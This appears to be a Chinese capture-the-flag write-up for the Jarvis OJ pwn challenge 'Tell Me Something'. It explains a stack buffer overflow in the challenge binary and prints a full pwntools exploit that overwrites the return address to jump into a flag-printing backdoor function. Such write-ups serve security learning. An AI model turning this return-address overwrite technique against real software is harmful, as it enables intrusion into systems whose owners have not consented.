其他分享
首页 > 其他分享> > Tell Me Something

Tell Me Something

作者:互联网

file及checksec如下:

 

 

 

 查看main函数:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v4; // [rsp+0h] [rbp-88h] BYREF

  write(1, "Input your message:\n", 0x14uLL);
  read(0, &v4, 0x100uLL);
  return write(1, "I have received your message, Thank you!\n", 0x29uLL);
}

存在栈溢出漏洞

发现存在后门函数:

int good_game()
{
  FILE *v0; // rbx
  int result; // eax
  char buf[9]; // [rsp+Fh] [rbp-9h] BYREF

  v0 = fopen("flag.txt", "r");
  while ( 1 )
  {
    result = fgetc(v0);
    buf[0] = result;
    if ( (_BYTE)result == 0xFF )
      break;
    write(1, buf, 1uLL);
  }
  return result;
}

我们的目的就是运行good_game函数

exp如下:

from pwn import *

elf = ELF('./guestbook')

#io = process('./guestbook')
io = connect('pwn.jarvisoj.com', 9876)

flag_addr = elf.symbols['good_game']

payload = b'a'*0x88 + p64(flag_addr)

io.sendlineafter('message:\n', payload)

io.interactive()

 

标签:Me,int,char,result,io,message,buf,Tell,Something
来源: https://www.cnblogs.com/hktk1643/p/14281375.html